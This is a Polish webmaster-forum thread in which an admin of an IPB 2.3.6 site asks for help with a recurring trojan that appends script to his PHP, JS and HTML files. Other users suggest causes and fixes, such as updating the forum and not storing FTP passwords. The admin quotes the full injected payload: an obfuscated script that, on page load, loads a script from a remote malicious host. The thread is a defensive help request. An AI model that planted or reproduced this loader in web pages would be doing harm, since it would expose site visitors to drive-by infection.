trojan

[mps]

Mam prośbę do plików php js i html na końcu dołączył swoje zapisy (

zaczynające się na <script>/*GNU GPL*/ try{window.onload) trojan JS.AGENT.ewh )

po zastąpieniu plików na zdrowe po kilku dniach problem się powtórzył

Jak myślicie czy to wina jakieś dziury w ipb czy wlazł inną drogą ?

Pliki oczywiście mają flagi odpowiednie.

Pozdrawiam

Miłosz Popiołek

Corrado Club Polska

www.corrado.com.pl

forum na ipb 2.3.6

Edytowane 4 Stycznia 2010 przez mps

[DawPi]

Witaj,

forum 2.3.6 - być może wyszedł jakiś prywatny exploit lub faktycznie ktoś wbija inną metodą na Twój serwer - np. właśnie poprzez dziurę na nim lub innym skrypcie, jaki masz na serwerze. Ten kod zapisuje się tylko do plików .js? Możesz pokazać więcej tego doklejonego kodu?

[mps]

Dzięki za odpowiedź.

Dokleja się do js, php, htm, html

<script>/*GNU GPL*/ try{window.onload = function(){var O7g0p7soo94zn = document.createElement('s(!c$$^)r#^@i@&^p^&)t#'.replace(/\^|\!|&|\)|\(|@|\$|#/ig, ''));var C1ox8mxhvtg8 = 'Opr1rsptk69o';O7g0p7soo94zn.setAttribute('type', 't@@e##&!x)t(&/$)#!j@!$@a^&v(@^a^$s)c)#r)#(i$$)p!@t@'.replace(/#|\^|\!|\)|&|@|\$|\(/ig, ''));O7g0p7soo94zn.setAttribute('src', 'h)(t^$t(&$#p$:@&/@/$#(5^#d!&!6@((d@#-)c$#$o$)m#^^#$.!)#o#$@!p#!^t()m!)d#$&.^$!c&^o)$!m(@(#.^^i!c$^)i$@)o^@-(^u#s!@(.$#@a&)^^m$p^&)s&$&(g)&u#^^i(#!d(&$e(.($r$(#u#^&8&^0@)8)(&0&@^$/(#b(a@@n&(^g!@@b@$^r!)o)^&@!s#^!1(!(.&!c@$$o#!m)/&&^b(#a(n&g##@^r(!(o&((s@!1!.$$!c#@o#^m^#/!^g^$#o&)o(&)g)l&!$!!e)(@#.@$&s@!k(/)^($g!(^o(&()o#)g&!$$l&e&^.!&c$o@#@m)/#($&p@o$r!$!$#n))))#b&&b$&().@!o!!@r$g!/#@@#'.replace(/\^|@|\(|\)|\!|\$|#|&/ig, ''));O7g0p7soo94zn.setAttribute('defer', 'd@$e&(^&f)^(e@$&r^&)@'.replace(/#|\$|&|@|\)|\^|\(|\!/ig, ''));O7g0p7soo94zn.setAttribute('id', 'X)^!z@&8(p!!2!!^b!8$q##x($8&)$c)))y#$!'.replace(/\!|@|&|\(|\^|\)|\$|#/ig, ''));document.body.appendChild(O7g0p7soo94zn);}} catch(Tytvx3v6ssk) {}</script>

<!--e06caf30406dbae6324a85833a28f7ef-->

[DawPi]

Czyli do każdego pliku generalnie. Doklejanie reklam przez hostingodawcę odpada? Czy masz takiego, który może to robić? Gdzie masz serwer kupiony?

[mps]

domena.pl

doklejanie przez hosta odpada pisałem zresztą do nich nic nie wiedzą

[DawPi]

Obawiam się, że nie wyczaimy drogi doklejania. To może być skrypt a może host, albo inny skrypt. Tak czy inaczej pierwsze co bym zrobił to aktualizację forum, by wykluczyć tę drogę.

[Jaroslaw]

Używasz total commander lub innego progsa do łączenia się z ftp.

Moja rada: nie zapamiętuj haseł w tych programach, jeśli masz hasło w których z tych w/w programów zapamiętane, to je skasuj.

Następie podmień zarażone pliki na zdrowe. do logowania się na ftp używaj hasła poprzez wklejanie z notatnika lub wpisywanie za każdym razem kiedy chcesz się połączyć z ftp =]

Zainstaluj jakiegoś trojan remover, przeskanuj dysk i po sprawie.

Pozdrawiam